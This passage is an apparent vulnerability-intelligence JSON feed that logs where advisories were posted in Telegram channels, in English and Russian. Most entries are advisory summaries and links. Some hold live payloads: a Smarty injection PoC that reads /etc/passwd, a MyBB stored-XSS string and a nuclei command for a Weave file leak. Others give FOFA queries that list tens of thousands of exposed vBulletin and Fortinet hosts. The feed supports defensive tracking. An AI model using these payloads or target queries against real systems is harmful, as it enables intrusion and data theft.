"vulnerability": "GHSA-6W96-9QW7-M599", "type": "seen", "source": "Telegram/afpqx5U4BmLApg0vDDGxSmW2u1LMTzTENI3LCYVeeaEOYCo", "content": "", "creation_timestamp": "2026-04-20T21:22:08.000000Z"}, {"uuid": "d982ac74-402a-452c-8ceb-9294127f83f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6W67-HWM5-92MQ", "type": "seen", "source": "Telegram/A1lyEnrveru8r36JeTUSG9i_uMBSze3SqULfIlWcLPSxRAo", "content": "", "creation_timestamp": "2026-04-20T23:18:52.000000Z"}, {"uuid": "9613e84a-b907-43ab-bbf7-f172e0659ee8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPF9-PH2J-CCR9", "type": "published-proof-of-concept", "source": "Telegram/3g7V6SV_71PzaXn8Yubvw4Z7qK4NE-jaYcye5068Hc2mjiw", "content": "", "creation_timestamp": "2026-04-17T23:20:15.000000Z"}, {"uuid": "ee14df8b-5be7-43e0-b2a4-d5c8e7575e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XG8H-J46F-W952", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/20075", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48379\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H)\n\ud83d\udd39 Description: Pillow is a Python imaging library. In versions 11.2.0 to before 11.3.0, there is a heap buffer overflow when writing a sufficiently large (&gt;64k encoded with default settings) image in the DDS format due to writing into a buffer without checking for available space. This only affects users who save untrusted data as a compressed DDS image. This issue has been patched in version 11.3.0.\n\ud83d\udccf Published: 2025-07-01T18:33:30.687Z\n\ud83d\udccf Modified: 2025-07-01T18:33:30.687Z\n\ud83d\udd17 References:\n1. https://github.com/python-pillow/Pillow/security/advisories/GHSA-xg8h-j46f-w952\n2. https://github.com/python-pillow/Pillow/pull/9041\n3. https://github.com/python-pillow/Pillow/commit/ef98b3510e3e4f14b547762764813d7e5ca3c5a4\n4. https://github.com/python-pillow/Pillow/releases/tag/11.3.0", "creation_timestamp": "2025-07-01T19:09:21.000000Z"}, {"uuid": "1f4dbce3-8953-432c-9b9c-ef19dc98f31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RF6-F9QG-8V94", "type": "exploited", "source": "Telegram/M0S2nQiwrZAE8hEYBCyRM1aSOqun4U_BEMvCJJ28aOKTfw", "content": "", "creation_timestamp": "2025-11-03T16:11:15.000000Z"}, {"uuid": "eb13910c-0241-43d0-bc7a-0008df1b5e41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RF6-F9QG-8V94", "type": "published-proof-of-concept", "source": "Telegram/2KVQYqZEtIM1arSksAxJJA_sWLK11XqSuiNRgaweDVGBog", "content": "", "creation_timestamp": "2025-11-03T14:57:22.000000Z"}, {"uuid": "535650fa-aec7-41c5-8983-55d0c38412d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180129-ASA1", "type": "seen", "source": "https://t.me/antichat/848", "content": "[Critical] Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability\n\nUPDATED 2/5/2018: After further investigation, Cisco has identified additional attack vectors and features that are affected by this vulnerability. In addition, it was also found that the original fix was incomplete so new fixed code versions are now available. Please see the Fixed Software section for more information. \n\n+++\n\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1", "creation_timestamp": "2018-02-05T19:07:46.000000Z"}, {"uuid": "d4d2a967-6e23-4ff5-aa81-58d853e11ac2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20181101-AP", "type": "published-proof-of-concept", "source": "https://t.me/antichat/2556", "content": "\u0415\u0449\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0442\u0435\u043c\u0443 \u0438\u043d\u0444\u043e\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438:\n\n1. \u041a\u0441\u0442\u0430\u0442\u0438, \u043e Facebook. \u041d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u043b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u043f\u0440\u043e\u0434\u0430\u0436\u0443 81 \u0442\u044b\u0441\u044f\u0447\u0430 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438. \nhttps://www.digitalshadows.com/blog-and-research/81000-hacked-facebook-accounts-for-sale-5-things-to-know/\n\u0422\u0443\u0442 \u0435\u0441\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043c\u043e\u0433\u0430\u043b\u0430 BBC \u0441 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435\u0439: \n- 81 \u0442\u044b\u0441\u044f\u0447\u0430 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432 \u2014\u00a0\u044d\u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0435, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 \u0435\u0441\u0442\u044c \u043b\u0438\u0447\u043d\u0430\u044f \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0430 (\u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0435). \u0414\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0444\u0438\u043b\u044f \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0432 \u0441\u0435\u0431\u044f \u0438\u043c\u0435\u043d\u0430, \u0430\u0434\u0440\u0435\u0441\u0430. \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u0440\u0443\u0437\u0435\u0439 \u0438 \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0443. \u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0439 \u0432 \u043f\u0440\u043e\u0444\u0438\u043b\u044f\u0445 \u043d\u0435\u0442. \u041e\u0431\u0449\u0435\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0444\u0438\u043b\u0435\u0439 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 \u2014\u00a0257 256. \u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u044d\u0442\u0438\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432 (30%) \u2014\u00a0\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0424\u0411 \u0438\u0437 \u0423\u043a\u0440\u0430\u0438\u043d\u044b, \u0435\u0449\u0435 9% - \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u0420\u043e\u0441\u0441\u0438\u0438. \u041f\u0440\u043e\u0434\u0430\u0432\u0435\u0446 \u0442\u0430\u043a\u0436\u0435 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0443 \u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c 120 \u043c\u043b\u043d \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432. \u041c\u0435\u0442\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u044b \u044d\u0442\u0438 \u0434\u0430\u043d\u043d\u044b\u0435, \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d, \u0445\u043e\u0442\u044f \u0435\u0441\u0442\u044c \u043f\u043e\u0434\u043e\u0437\u0440\u0435\u043d\u0438\u0435 \u043d\u0430 \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435. \n\n2. \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 side-channel \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u0430\u0445 Intel, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043a\u043b\u044e\u0447\u0430\u043c \u0438 \u0434\u0440\u0443\u0433\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u0412\u0441\u0442\u0440\u0435\u0447\u0430\u0439\u0442\u0435 PortSmash! \n\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0442\u0443\u0442: https://seclists.org/oss-sec/2018/q4/123. \u0412\u043e \u0432\u0441\u0435\u043c \u0432\u0438\u043d\u043e\u0432\u0430\u0442 Hyper-Threading, \u043a\u043e\u0433\u0434\u0430, \u0433\u0440\u0443\u0431\u043e \u0433\u043e\u0432\u043e\u0440\u044f, \u043e\u0434\u043d\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0438\u0437 \u0441\u0432\u043e\u0435\u0433\u043e \u0442\u0440\u0435\u0434\u0430 \u043d\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u0435 \u043c\u043e\u0436\u0435\u0442, \u043f\u043e \u0441\u0443\u0442\u0438, \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u0442\u044c \u0432 \u0434\u0440\u0443\u0433\u043e\u0439 \u0442\u0440\u0435\u0434 \u2014\u00a0\u0438\u0437\u0443\u0447\u0438\u0432 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u044d\u0448\u0430\u043c \u0438 \u0442\u0430\u0439\u043c\u0438\u043d\u0433 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439. \u0412\u044b\u0445\u043e\u0434 \u043e\u0434\u0438\u043d \u2014\u00a0\u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0442\u044c HT, \u0445\u043e\u0442\u044f Intel \u0441\u0447\u0438\u0442\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043d\u0435\u0442, \u0438 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0430\u043a\u043e\u0439 \u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432 \u043a \u0430\u0442\u0430\u043a\u0430\u043c \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0440\u043e\u0434\u0430. \u042d\u0442\u0430 \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u044f \u043a Spectre \u0438 \u043f\u0440\u043e\u0447. \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0441\u043f\u0435\u043a\u0443\u043b\u044f\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f. \n\n\n3. \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Bluetooth Low Energy \u0447\u0438\u043f\u0430\u0445 Texas Instruments - \u0447\u0438\u043f\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439 \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a Aruba, Cisco \u0438 Meraki. \u041f\u0435\u0440\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f Bleeding Bit, \u0432\u0442\u043e\u0440\u0430\u044f \u0432\u0440\u043e\u0434\u0435 \u0431\u044b \u0431\u0435\u0437 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f, \u043d\u043e \u0432 \u0438\u0442\u043e\u0433\u0435 \u043e\u0434\u043d\u0430 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 memory overflow \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435, \u0430 \u0432\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u043d\u0430 \u0440\u043e\u0443\u0442\u0435\u0440\u044b Aruba, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u0432 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u0445 \u0434\u043e\u0441\u044f\u0433\u0430\u0435\u043c\u043e\u0441\u0442\u0438 Bluetooth \n\n\u0421\u0441\u044b\u043b\u043a\u0438 \u043f\u043e \u0442\u0435\u043c\u0435:\nhttps://www.kb.cert.org/vuls/id/317277/\nhttps://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-006.txt\nhttps://meraki.cisco.com/blog/cisco-meraki-customer-advisories/\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181101-ap\n\n4. 0-day \u0432 Virtual Box\nhttps://github.com/MorteNoir1/virtualbox_e1000_0day/blob/master/README.md\n\n5. \u0423\u0442\u0435\u0447\u043a\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043e\u0442\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u043d\u043a\u0430 HSBC\nhttps://www.databreachtoday.com/hsbc-bank-alerts-us-customers-to-data-breach-a-11685", "creation_timestamp": "2018-11-08T21:12:09.000000Z"}, {"uuid": "ba77f771-eac3-4ee8-a26a-5db629701738", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-634X-PC3Q-CF4C", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1773", "content": "Smarty PHP Code Injection\n&lt; 3.1.45 / &gt;= 4.0.0 / &lt; 4.1.1\nCVE-2022-29221\nPoC:\n{block name='*/phpinfo();/*'}{/block}\n{include file='string:*/include\"/etc/passwd\";exit;/*' inline=1}\nhttps://github.com/advisories/GHSA-634x-pc3q-cf4c\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-06-19T19:04:30.000000Z"}, {"uuid": "f2e8c9ee-56c7-4eea-a75a-8a6f2e16c362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R49H-6QXQ-624F", "type": "published-proof-of-concept", "source": "https://t.me/G18Division/34", "content": "Exploit for W&amp;B Weave Server - Remote Arbitrary File Leak (CVE-2024-7340)\ud83e\udd77\n\nDescription\ud83d\udd08\nThe Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.\n\nNuclei Template\ud83c\udf0e\nView the template here CVE-2024-7340.yaml\n\nValidate with Nuclei\necho \"$URL\" | nuclei -t ~/nuclei-templates/http/cves/2024/CVE-2024-7340.yaml\n\nReferences:\nhttps://nvd.nist.gov/vuln/detail/CVE-2024-7340\nhttps://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/\nhttps://github.com/wandb/weave/pull/1657\nhttps://github.com/advisories/GHSA-r49h-6qxq-624f", "creation_timestamp": "2024-09-17T09:09:01.000000Z"}, {"uuid": "7d90ffb7-42b8-46b0-a9c6-0027aa1da60f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6483-HCPP-P75W", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/96", "content": "PoC for a stored XSS in MyBB &lt; 1.8.25 (CVE-2021-27279). The vulnerability was found by our researcher Igor Sak-Sakovskiy.\n\nPayload: [email]a@a.a?[email=a@a.a? onmouseover=alert(1) a]a[/email][/email]\n\nAdvisory: https://github.com/mybb/mybb/security/advisories/GHSA-6483-hcpp-p75w", "creation_timestamp": "2021-12-07T13:52:25.000000Z"}, {"uuid": "60b127a1-d8af-4da2-8d56-8b4c719b8c56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4P4P-VQ2V-9489", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18826", "content": "\ud83d\udea8CVE-2025-48952: NetAlertX Password Bypass Vulnerability due to Loose Comparison in PHP\n\nPoC and Advisory: https://github.com/jokob-sk/NetAlertX/security/advisories/GHSA-4p4p-vq2v-9489\n\nDetails: https://www.cvedetails.com/cve/CVE-2025-48952/\n\nCVSS: 9.4", "creation_timestamp": "2025-07-07T19:39:48.000000Z"}, {"uuid": "a976473b-9b2c-4bc5-9c0c-d54205c9ff99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9W8-84CH-4GH4", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17728", "content": "\ud83d\udea8CVE-2025-5128: SQL Injection Vulnerability in ScriptAndTools Real-Estate Admin panel bypass\n\nCredit: youtube.com/@hack3rclub539\n\nAdvisory: https://github.com/advisories/GHSA-q9w8-84ch-4gh4", "creation_timestamp": "2025-06-03T09:08:52.000000Z"}, {"uuid": "08250e8f-5b88-491f-9010-cbc43177d75d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-23FP-MRFV-CWV4", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17809", "content": "\ud83d\udea8CVE-2025-48827 and CVE-2025-48828: vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3  Remote Code Execution Vulnerabilities\n\nFOFA Link: https://en.fofa.info/result?qbase64=YXBwPSJ2QnVsbGV0aW4i\nFOFA Query: app=\"vBulletin\"\nResults: 26,046\n\nHunter.how Link: https://hunter.how/list?searchValue=product.name%3D%22vBulletin%22&amp;timestamp=1748994874943\nQuery: product.name=\"vBulletin\"\nResults: 22,121\n\nPoC: https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce\nAdvisory: https://github.com/advisories/GHSA-23fp-mrfv-cwv4\nCVSS: 10", "creation_timestamp": "2025-06-04T00:05:59.000000Z"}, {"uuid": "f3090ed8-232d-4b61-83f0-86f8287a840c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FCPX-H44G-VX2X", "type": "seen", "source": "https://t.me/TheDarkWebInformer/17833", "content": "\ud83d\udea8CVE-2025-32756: Critical Stack-Based Buffer Overflow in Fortinet Products\n\nFOFA Link: https://en.fofa.info/result?qbase64=YXBwPSJGT1JUSU5FVC1Gb3J0aVZvaWNlIiB8fCBhcHA9IkZvcnRpbmV0LUZvcnRpTkRSIiB8fCBhcHA9IkZPUlRJTkVULUZvcnRpQ2FtZXJhIiB8fCBhcHA9IkZPUlRJTkVULUZvcnRpTWFpbCIgfHwgYXBwPSJGT1JUSU5FVC1Gb3J0aVJlY29yZGVyIiB8fCA%3D\n\nFOFA Query: app=\"FORTINET-FortiVoice\"  app=\"Fortinet-FortiNDR\"  app=\"FORTINET-FortiCamera\"  app=\"FORTINET-FortiMail\"  app=\"FORTINET-FortiRecorder\"\n\nResults: 48,224\n\nAdvisory: https://github.com/advisories/GHSA-fcpx-h44g-vx2x\n\nCVSS: 9.8", "creation_timestamp": "2025-06-04T17:07:00.000000Z"}, {"uuid": "910da625-8b92-41cb-9806-31ca2e671f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3XV-6967-CV88", "type": "published-proof-of-concept", "source": "Telegram/ph88y4G5oeScgD258CchMKrpr3BuS4k3KcSxkFOuLvPbbMI", "content": "", "creation_timestamp": "2025-06-11T20:16:04.000000Z"}, {"uuid": "83677a2e-a20c-4e58-9ff5-43e8d5bd5f9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180328-SMI2", "type": "published-proof-of-concept", "source": "https://t.me/sysadm_in_channel/221", "content": "\u041e\u043f\u043f\u0430.. \u0443 \u043a\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f Cisco \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u0435\u0449\u0451 \u0433\u0434\u0435-\u0442\u043e, \u0435\u0441\u0442\u044c \u043f\u043e\u0432\u043e\u0434 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2\n\n\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u0430 \u0441 \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430\u043c\u0438 PoC)) :\nhttps://embedi.com/blog/cisco-smart-install-remote-code-execution/", "creation_timestamp": "2018-04-06T03:17:37.000000Z"}, {"uuid": "d01814ce-0bc7-4d48-99e3-228fb55dc96d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180104-CPUSIDECHANNEL", "type": "seen", "source": "https://t.me/alexmakus/1615", "content": "Cisco \u0442\u043e\u0436\u0435 \u0434\u043e\u043b\u043e\u0436\u0438\u043b\u0430\u0441\u044c \u043e \u0441\u0442\u0430\u0442\u0443\u0441\u0435 \u0441\u0432\u043e\u0438\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 Meltdown/Spectre, \u043f\u043e\u043e\u0431\u0435\u0449\u0430\u043b\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0430\u043f\u0434\u0435\u0439\u0442\u044b \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 \u043f\u0440\u043e\u0442\u0438\u0432 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438 \u043f\u043e\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u043f\u043e\u0447\u0430\u0449\u0435 https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180104-cpusidechannel", "creation_timestamp": "2018-01-05T16:19:44.000000Z"}, {"uuid": "d2be1f84-dc4c-4110-be98-481562f6a032", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MJ5-HJJJ-8RGW", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/750", "content": "https://github.com/JAckLosingHeart/CVE-2024-55875\n\nCVE-2024-55875 | GHSA-7mj5-hjjj-8rgw | http4k first CVE\n#github #exploit", "creation_timestamp": "2024-12-18T10:36:45.000000Z"}, {"uuid": "78ebf51d-c393-4194-b1cf-27b5ff4d1cca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-584Q-6J8J-R5PM", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/646", "content": "#exploit\n1. CVE-2024-41992:\nArcadyan FMIMG51AX000J (WiFi Alliance) RCE\nhttps://ssd-disclosure.com/ssd-advisory-arcadyan-fmimg51ax000j-wifi-alliance-rce\n\n2. CVE-2024-48930:\nRemote Private key extraction over ECDH\n(11 session..)\nhttps://github.com/cryptocoinjs/secp256k1-node/security/advisories/GHSA-584q-6j8j-r5pm", "creation_timestamp": "2024-10-29T10:48:04.000000Z"}, {"uuid": "4e493ce7-8185-413e-ae87-fb8bcdef3584", "vulnerability_lookup_origin": 